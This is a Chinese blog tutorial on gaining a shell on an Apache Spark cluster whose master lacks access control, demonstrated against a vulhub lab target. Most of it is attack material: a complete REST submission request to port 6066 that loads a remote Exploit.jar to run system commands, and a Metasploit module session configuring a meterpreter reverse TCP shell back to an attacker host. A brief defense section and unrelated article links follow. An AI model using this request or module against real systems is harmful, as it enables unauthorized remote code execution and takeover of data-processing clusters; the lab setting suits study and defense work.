Spark未授权访问getshell

一、介绍 apache顶级项目，大规模数据处理计算引擎。为了方便的给使用者控制系统进行计算和查看任务结果，提供了WebUI图形化界面和相应的REST API方便用户操作。支持用户向管理节点提交应用，并分发给集群使用，如果管理节点未启用ACL（访问控制），我们便可在集群中执行任意代码。二、环境搭建受害者IP：192.168.226.140（vulhub漏洞靶场、docker）》》standalon

風月长情

5586人浏览 · 2020-06-01 14:39:25

風月长情 · 2020-06-01 14:39:25 发布

文章目录

一、介绍

apache顶级项目，大规模数据处理计算引擎。为了方便的给使用者控制系统进行计算和查看任务结果，提供了WebUI图形化界面和相应的REST API方便用户操作。支持用户向管理节点提交应用，并分发给集群使用，如果管理节点未启用ACL（访问控制），我们便可在集群中执行任意代码。

二、环境搭建

受害者IP：192.168.226.140（vulhub漏洞靶场、docker）

》》standalone模式启动一个Apache Spark集群
在这里插入图片描述
》》查看启动的端口服务

》》浏览器访问即可看到master管理页面：

三、攻击方法

3.1 信息收集

》》nmap扫描对方端口服务信息，如有以下端口开放可能存在漏洞
在这里插入图片描述
》》访问web，查看其版本（v2.3.1）

3.2 利用方法（方法一）

使用REST API方式提交应用（standalone模式下，master将在6066端口启动一个HTTP服务器，我们向这个端口提交REST格式的API恶意代码）

github地址：https://github.com/aRe00t/rce-over-spark

POST /v1/submissions/create HTTP/1.1
Host: your-ip:6066
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/json
Connection: close
Content-Length: 680

{
  "action": "CreateSubmissionRequest",
  "clientSparkVersion": "2.3.1",
  "appArgs": [
    "whoami,w,cat /proc/version,ifconfig,route,df -h,free -m,netstat -nltp,ps auxf"
  ],
  "appResource": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
  "environmentVariables": {
    "SPARK_ENV_LOADED": "1"
  },
  "mainClass": "Exploit",
  "sparkProperties": {
    "spark.jars": "https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar",
    "spark.driver.supervise": "false",
    "spark.app.name": "Exploit",
    "spark.eventLog.enabled": "true",
    "spark.submit.deployMode": "cluster",
    "spark.master": "spark://your-ip:6066"
  }
}

Tips：
目标：Host: your-ip:6066
版本：“clientSparkVersion”: “2.3.1”
执行的命令： “appArgs”: [" "]

》》构造好请求包使用发包工具发包即可
在这里插入图片描述
》》返回包中会返回submissionid

》》访问http://your-ip:8081/logPage/?driverId={submissionId}&logType=stdout，即可查看执行结果

3.2 利用方法（方法二）

使用Metasploit的exploit模块

kali：192.168.226.134

msf5> use exploit/linux/http/spark_unauth_rce
msf5> set payload java/meterpreter/reverse_tcp
msf5> set rhost 192.168.226.140
msf5> set rport 6066
msf5> set lhost 192.168.226.134
msf5> set lport 4444
msf5> set srvhost 192.168.226.134
msf5> set srvport 8080
msf5> exploit

（成功获得shell，查看对方IP信息）
在这里插入图片描述
》》可以在web端查看启动的作业

四、防御方法

限制网络访问（配置防火墙策略，禁止将端口映射到互联网，限制于内网内）
启用UI访问控制（通过spark.ui.filters设置启用javax servlet filters，通过 SSL 设置启用 HTTPS/SSL，保障 Spark UI 安全）

向您推荐>>Eolink开发者社区

权威｜前沿｜技术｜干货｜国内首个API全生命周期开发者社区

更多推荐

ELK实现containerd的容器日志采集展示【基于logging的全栈监测】

企业级ELK Stack构建介绍

云原生

深入理解 Mocha 测试框架：从零实现一个 Mocha

前言什么是自动化测试自动化测试在很多团队中都是Devops环节中很难执行起来的一个环节，主要原因在于测试代码的编写工作很难抽象，99%的场景都需要和业务强绑定，而且写测试代码的编写工作量往往比编写实际业务代码的工作量更多。在一些很多业务场景中投入产出比很低，适合写自动化测试的应该是那些中长期业务以及一些诸如组件一样的基础库。自动化测试是个比较大的概念，其中分类也比较多，比如单元测试，端对端测试，集

云原生

(20200916 Solved)docker-compose up创建容器自动退出

问题描述如题，创建容器后自动退出了。并且docker start container无效解决方案原因是缺失了控制终端的配置，需要在docker-compose.yml中增加tty:true ，有时候这样也不行，需要再增加一个command:/bin/bash，命令不一定是这个，需要是一个不会退出的命令，然后用-d后台启动容器。Referencesdocker-compose启动容器后自动退出...